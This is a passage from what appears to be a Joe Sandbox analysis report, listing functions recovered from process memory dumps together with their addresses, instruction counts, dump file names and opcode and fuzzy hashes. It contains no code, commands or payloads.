              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 584e3d3eb24bf37bbc8d5f0658cbede96d97f0a1fcd91f5326b7c662ed16b2a7
              • Instruction ID: 7c0d68c2cd5d9ea8aa1f6c346e5ff328686f4d686951d6236e90ab459b7b2a38
              • Opcode Fuzzy Hash: 584e3d3eb24bf37bbc8d5f0658cbede96d97f0a1fcd91f5326b7c662ed16b2a7
              • Instruction Fuzzy Hash: 0D11AFB4908A8E8FDB89EF78C8992B97BA1FF58311F1005BED809C2292CF35A544C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF43B45 Relevance: .1, Instructions: 66COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1ed24e44789bb20744eeb89d1e2a602962953d902343f14fbf114b8c2828a7d9
              • Instruction ID: 886b1efba4315ee4aebc1f0ab244ca789586775e4313fe344aafcef0bd295379
              • Opcode Fuzzy Hash: 1ed24e44789bb20744eeb89d1e2a602962953d902343f14fbf114b8c2828a7d9
              • Instruction Fuzzy Hash: BD11AFB0819A4E8FDB99EF78C4992B97BA0FF58311F4005BED819C2592CF35A148C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF43AA9 Relevance: .1, Instructions: 65COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e8e6cc0feecb8e3fed4549af64f33673a85586b811fe9bbaa270c1e7984d6c85
              • Instruction ID: cf2021944e8f5be867ec2d966e2432d721202ca69d83c7502a87c0e177ff1b19
              • Opcode Fuzzy Hash: e8e6cc0feecb8e3fed4549af64f33673a85586b811fe9bbaa270c1e7984d6c85
              • Instruction Fuzzy Hash: 4F21D2B490964E8FDB89EF78C4992B97BB0FF58300F0005BED809C6192CA35A449C751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF41DBC Relevance: .1, Instructions: 63COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 039639f4a2dcd669346a8d9a5ef3a014755c45caff3f6e38d04b788ebd0524c1
              • Instruction ID: dcc742b9d05090b02d96b7b7bfdc832f090273b5f3bede53be148adac1e2e3ba
              • Opcode Fuzzy Hash: 039639f4a2dcd669346a8d9a5ef3a014755c45caff3f6e38d04b788ebd0524c1
              • Instruction Fuzzy Hash: 1D11E6B484E68D4FEB0ADB70C9696F93BB0EF06300F0540FBD809CB093DA29A549C311
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF30D0D Relevance: .1, Instructions: 61COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.440791664.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf30000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 32b37fe1f473381e9ca380b78250e1915d326c5086352b47da8f0bf03c1337f5
              • Instruction ID: cb40735d4d463c84beb9f77463ef18138cfcec19adbd0e946531b0dc6e5a51a4
              • Opcode Fuzzy Hash: 32b37fe1f473381e9ca380b78250e1915d326c5086352b47da8f0bf03c1337f5
              • Instruction Fuzzy Hash: C211BBB181964DAEEB9ADB78C8593F87BE0EF59310F0004BBC819C6692CE26A448C711
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF443F9 Relevance: .1, Instructions: 60COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ac69bc1f1725959d58ff61cbac8777deb39384d6c3a502596636f5c4144eef6c
              • Instruction ID: 9e937c5b94f344de38acc49037199675aa4b97f4e2a265bf690c2e7f8d7d2048
              • Opcode Fuzzy Hash: ac69bc1f1725959d58ff61cbac8777deb39384d6c3a502596636f5c4144eef6c
              • Instruction Fuzzy Hash: CC118EB090968E4FEB4AEB74C8A92B97FA0EF15301F4404BAD80AD61A2DE25A448C751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF420D8 Relevance: .1, Instructions: 60COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c4a040e06d23ff1fae05a686da155d6f6be81e1d8ddc238169cd8619a11491b6
              • Instruction ID: c8e7d4e9e3800781064cf8bada850aaf07b4e24a997123dd8a37fd85649ba678
              • Opcode Fuzzy Hash: c4a040e06d23ff1fae05a686da155d6f6be81e1d8ddc238169cd8619a11491b6
              • Instruction Fuzzy Hash: 100108FA94D55A8BE751AB7CD8991F93B90EF84311F0504BBCE48C6082DB25E45D8780
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF40561 Relevance: .1, Instructions: 60COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 39c71de8a619f7d1d501c77110a8bca6889722eea790d9846ee4cf1805847171
              • Instruction ID: ab8501e8258bebf47586730fc98faa7fd2ee9d42b05ab4796232007d9db44875
              • Opcode Fuzzy Hash: 39c71de8a619f7d1d501c77110a8bca6889722eea790d9846ee4cf1805847171
              • Instruction Fuzzy Hash: E011A1B0809A4E9FEB95EF78C49D6BE7BE0FF18301F4004BAD819C6191DB35A554CB00
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF420E8 Relevance: .1, Instructions: 57COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 047ec21ff65a2130e95be79e5b40b4bc9445de3ea80c5bf950eda2e067eb00ae
              • Instruction ID: 81410040e2cc9ac0a75015fd9d379b36759b915387cccbd37832b13dd59051bb
              • Opcode Fuzzy Hash: 047ec21ff65a2130e95be79e5b40b4bc9445de3ea80c5bf950eda2e067eb00ae
              • Instruction Fuzzy Hash: A2118FB890890E8EEB89EF78C8992BD77A0FF58304F50057AD81DC21A1CE35A144C751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF456F9 Relevance: .1, Instructions: 57COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 09d4e906c955b642e8b709fbfbd40d1134669553ab3b177616b602e1005133d3
              • Instruction ID: 91404cfc6f09b306eb7b9ebf595267914b421c81156507de46a5269a87804e7a
              • Opcode Fuzzy Hash: 09d4e906c955b642e8b709fbfbd40d1134669553ab3b177616b602e1005133d3
              • Instruction Fuzzy Hash: FE119EB0D0D68E8FEB52EB78899D2A97BF0EF15311F4505B6D808C71A2EA28A548C751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4410D Relevance: .1, Instructions: 57COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 101aa80a0b27e71350da420094a1a6c93fa30aa06f5e0e209a6556746e05dbef
              • Instruction ID: 22b25b207495c50c52958fed7017556e46a995f832e15f6aae9151e21e392e55
              • Opcode Fuzzy Hash: 101aa80a0b27e71350da420094a1a6c93fa30aa06f5e0e209a6556746e05dbef
              • Instruction Fuzzy Hash: BA119DB080964E8FEB9AEB74C8992BA7FE0FF68300F0105BAD41AD6192DE35A544C711
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4658D Relevance: .1, Instructions: 57COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7fd3c2dbf34dea908a52b403b593edbdb5ddd4a293ddda0d43a0daf63997ff50
              • Instruction ID: 4cb9aef0538e00d7ed007f2dda380c78ba22e8bec2e57d7a12efbbba1d25d455
              • Opcode Fuzzy Hash: 7fd3c2dbf34dea908a52b403b593edbdb5ddd4a293ddda0d43a0daf63997ff50
              • Instruction Fuzzy Hash: CE11E3B490964E4FDB59EF34C8A92B97BA0EF58310F4441BED80DC6192DE36A548C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF46AD1 Relevance: .1, Instructions: 56COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1bb64bb9c4c87597806d0ff18384fa8b698ff4fa7e2d8bb6a82011d3b1c7b2e8
              • Instruction ID: 92bb43a1ccf4e3b74d07045cdfb31cc740c42cf64a6509571c392eacc840dee5
              • Opcode Fuzzy Hash: 1bb64bb9c4c87597806d0ff18384fa8b698ff4fa7e2d8bb6a82011d3b1c7b2e8
              • Instruction Fuzzy Hash: 19117CB490995E9FEB42EB74C98C5AA7BE4FF19301F0044B6D808C70A1DE39E184C760
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42A75 Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a110d1ac3144bdb07dcb3d4071750b072dd3b09f5cd3ca6e7c1ccab694a11164
              • Instruction ID: 8d0394d69e4a2777d1cbba06dbb3ae40115aaaa53bcc453de133c5efa0ca2ca0
              • Opcode Fuzzy Hash: a110d1ac3144bdb07dcb3d4071750b072dd3b09f5cd3ca6e7c1ccab694a11164
              • Instruction Fuzzy Hash: AC11A1B4D1954E8FE765EB78C99D2BA7BE0FF14300F4505B6E81CC6092DE24E5488751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4436D Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 068a23d0eab3bc9f5c3357c625bc35d29ae769b321fe2df6c8f9ebcd66b6e36b
              • Instruction ID: 4b90bac8c97b78c974894e8c7880e294cdf66a0ea23811b9e4c1adfbb08f679e
              • Opcode Fuzzy Hash: 068a23d0eab3bc9f5c3357c625bc35d29ae769b321fe2df6c8f9ebcd66b6e36b
              • Instruction Fuzzy Hash: 9C11E0B0918A8E8FDB4AEB74C85D2B97BE1FF18304F0009BAD81AD6192DF35A558C711
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3BC69 Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441130971.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf3a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 92b9cb1cca3807886b8662a0a8a71eff989c569741f8778f7e3dc6c58c604a49
              • Instruction ID: 18fd796cf0204ab3ca3744f202e878b278fba5400f0228a8eae9a3c7f52470cc
              • Opcode Fuzzy Hash: 92b9cb1cca3807886b8662a0a8a71eff989c569741f8778f7e3dc6c58c604a49
              • Instruction Fuzzy Hash: 88115EB090964D9FEB96EB74C8AD1F97BE0FF69301F4004BAD819C6292DE76A944C740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF33415 Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.440791664.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf30000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 96d1402e592a245b426925129bbc6c48a8547b7ec141e63babe986053fb0ec37
              • Instruction ID: b915e73ca4709b0d59b4b31f32d30043e5da4872d32e8f4e8084e10ae3b5ffc6
              • Opcode Fuzzy Hash: 96d1402e592a245b426925129bbc6c48a8547b7ec141e63babe986053fb0ec37
              • Instruction Fuzzy Hash: 8C118EB090965E9FEB9AEF78C8581FD7BA0FF18301F4005BED829C6292DB35A449C700
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF420E0 Relevance: .1, Instructions: 54COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 22cd9073782e8a07bff055e9ecb59247898411ecc17ecad0ef6e30853b19c06d
              • Instruction ID: d2ef2b2d0beb04f4874b9e8f834a69c170ad4330d490ab20428622fa6ad40d27
              • Opcode Fuzzy Hash: 22cd9073782e8a07bff055e9ecb59247898411ecc17ecad0ef6e30853b19c06d
              • Instruction Fuzzy Hash: 1901F5F994D55E8AF762AB78D89E1F93BA0EF84311F0504BBDA08C6082DA25E44D8780
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3C069 Relevance: .1, Instructions: 54COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441130971.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf3a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f002f6936c7259e973a27240ba62cbbb6669ac1f5208a90d373e5e44736d77ad
              • Instruction ID: 63cc6e77d7a794f5e72f9b2c253970c1a4c6d05e12a2c545fa37457fff066987
              • Opcode Fuzzy Hash: f002f6936c7259e973a27240ba62cbbb6669ac1f5208a90d373e5e44736d77ad
              • Instruction Fuzzy Hash: 231102B580968D9FDB8AEF34C4581F93FA0FF59300F1002BAD419C7192CA39A948C740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3B895 Relevance: .1, Instructions: 54COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441130971.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf3a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 749d607b0bae25d5b1d3d047185ecf067acdcb58c7c6cbe04dfc87f23086e36f
              • Instruction ID: a24fc5ec2e226362981354c551465a9f425ce8f7329c38831ae4880f96b055f2
              • Opcode Fuzzy Hash: 749d607b0bae25d5b1d3d047185ecf067acdcb58c7c6cbe04dfc87f23086e36f
              • Instruction Fuzzy Hash: D1117CB090A64D9FEB99EF78C46D2F97BA0FF18301F0004BED819C6291DA36A545C740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF463D5 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 91a877ddef98c7ef9bd340c0a2e6c401b2a77e0322cf6c12bdfbe889f8e0c93c
              • Instruction ID: 29f1f63dafe536d0f353ae5052825cca3ed96a02e1b39593654b3b3452c4a947
              • Opcode Fuzzy Hash: 91a877ddef98c7ef9bd340c0a2e6c401b2a77e0322cf6c12bdfbe889f8e0c93c
              • Instruction Fuzzy Hash: 8401A1B890968E8FEB99DF78C8592B93BA0FF54300F40057AE80CC25A2DB35E548C781
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF46F99 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 96e653f96e7332767fa564436489aa495f201240d7ac874a212733b21a75286b
              • Instruction ID: 7dc391bf582cb835aa2fa533c451d6fb17ac3286ba50237ecdd50e19c32961b4
              • Opcode Fuzzy Hash: 96e653f96e7332767fa564436489aa495f201240d7ac874a212733b21a75286b
              • Instruction Fuzzy Hash: 2C118EB481965D8FEB4ADB74C8991B93BA0FF15311F4004BAE859C6192EA3AA918C750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3ABA5 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441130971.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf3a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5cbe7143fcb9067a2387701425cc8a0ff1a482f7bfe2d2c9bfa54f8862164d85
              • Instruction ID: b1f430c28501b7b4d00fc004c9e71394082f73bddd8b4a4a0b3d18220973bbfb
              • Opcode Fuzzy Hash: 5cbe7143fcb9067a2387701425cc8a0ff1a482f7bfe2d2c9bfa54f8862164d85
              • Instruction Fuzzy Hash: 920169B081964A9FE752EBB5C84D5E97BE1EF59300F0015B6D828D62A2EA29E4988740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF32D61 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.440791664.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf30000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d1245028d8804796a223a30ac0baa8140cfeaea2574e600a66dc10280d78b9ba
              • Instruction ID: 2ec292b508e0f3ab2b64da4d1e8560cacadaf15fe3135089e1fac3a9e4441659
              • Opcode Fuzzy Hash: d1245028d8804796a223a30ac0baa8140cfeaea2574e600a66dc10280d78b9ba
              • Instruction Fuzzy Hash: B301DFB0D1965E5FE7A2EB38C44C6E93BE0EF59300F4104B6D828C62A2EE38E5488700
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF473E1 Relevance: .1, Instructions: 52COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9ad408c325fcf406a8404d6f0b4c60e7e99a057fde3c63cc35e7e997cc9bb011
              • Instruction ID: 3c1a526bc702f3ac6e487c4ffd60c81573845c59faa869f4c8ce8dafcb88c326
              • Opcode Fuzzy Hash: 9ad408c325fcf406a8404d6f0b4c60e7e99a057fde3c63cc35e7e997cc9bb011
              • Instruction Fuzzy Hash: 9101B1B0809A4ECFDB59DB74C5991B93FA0EF14300F4004BFD80AC61A2DE3AA554C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF305F1 Relevance: .1, Instructions: 51COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.440791664.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf30000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cb5a8081e11c311b132fb02a266f12ea776856cdf20ed7057f364959a2cdc15b
              • Instruction ID: 1465b850a15641bda26ce31eb996e79eb32dc900809ce8667b1b70952773e030
              • Opcode Fuzzy Hash: cb5a8081e11c311b132fb02a266f12ea776856cdf20ed7057f364959a2cdc15b
              • Instruction Fuzzy Hash: B701B1F0A1960E5FE392EB78C48D5E97BF0EF98300F4104B6D819C32A6DE38E448CA40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF301D0 Relevance: .0, Instructions: 50COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.440791664.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf30000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 691dd7c997a1920a780693a6adf794b749ecfe7ac48d2573e0ba71b0eaec6052
              • Instruction ID: 069b4cccae094363012a6a6a6684e3f8abd415e46c7180058975d103bb1b0dbc
              • Opcode Fuzzy Hash: 691dd7c997a1920a780693a6adf794b749ecfe7ac48d2573e0ba71b0eaec6052
              • Instruction Fuzzy Hash: 1B0180B090950D9EDF99EF34C4496FA77A1EF58304F50847AD81EC2290CA76A555CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3A4C9 Relevance: .0, Instructions: 49COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441130971.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf3a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 454995c5dcad11a80e8ec486d7d937923b6eeecdb0806977f350526481743508
              • Instruction ID: 322f89a7e476ec252665fc6bd3fb10f5855d3ea6a0f7f78c7759d23715368fe1
              • Opcode Fuzzy Hash: 454995c5dcad11a80e8ec486d7d937923b6eeecdb0806977f350526481743508
              • Instruction Fuzzy Hash: F20180B090A68D5FDB9ADB74C86D1F97BA0EF19301F4504BFD81AC6192DE26A858C710
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF46C59 Relevance: .0, Instructions: 46COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bbcb6028d5c29ed38b83c30ab9dd95e1c35f60471702ab53c88bc61043d43b8d
              • Instruction ID: 35681f044f968552ac901e695ff5c50024824eba6e679b4b6bda17977b86eefb
              • Opcode Fuzzy Hash: bbcb6028d5c29ed38b83c30ab9dd95e1c35f60471702ab53c88bc61043d43b8d
              • Instruction Fuzzy Hash: 21018FB490E64A9FE752EB78C99D1A93FE0EF59301F4508B6D908C70A2EE29E5488750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF32DD9 Relevance: .0, Instructions: 46COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.440791664.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf30000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dfd23763121217a8bdb28452d71e2c96c3855a327e0bdfe73e95136b403fe9c1
              • Instruction ID: 32f3c7569826a6b94fc7a90abce857a580fdf14675d03c690c236a46c6e2a211
              • Opcode Fuzzy Hash: dfd23763121217a8bdb28452d71e2c96c3855a327e0bdfe73e95136b403fe9c1
              • Instruction Fuzzy Hash: 940184B181E6495FE753EB34C88D1E97FE0EF59301F0505B6D828C71A3DA29E498C751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4745D Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9bd9b9b061096c92c4341db46104dde305090b896cd3611b242a0cbb285bbdff
              • Instruction ID: 283c7cb3d24a6e45c6771420c22b21ad9ca6b3b76e404329fc07596d61933116
              • Opcode Fuzzy Hash: 9bd9b9b061096c92c4341db46104dde305090b896cd3611b242a0cbb285bbdff
              • Instruction Fuzzy Hash: 1E0171B080AA4ECFDB59EF74C5991BA7FA0FF55300F1004BFD80AC61A2DA76A544C750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF420F0 Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
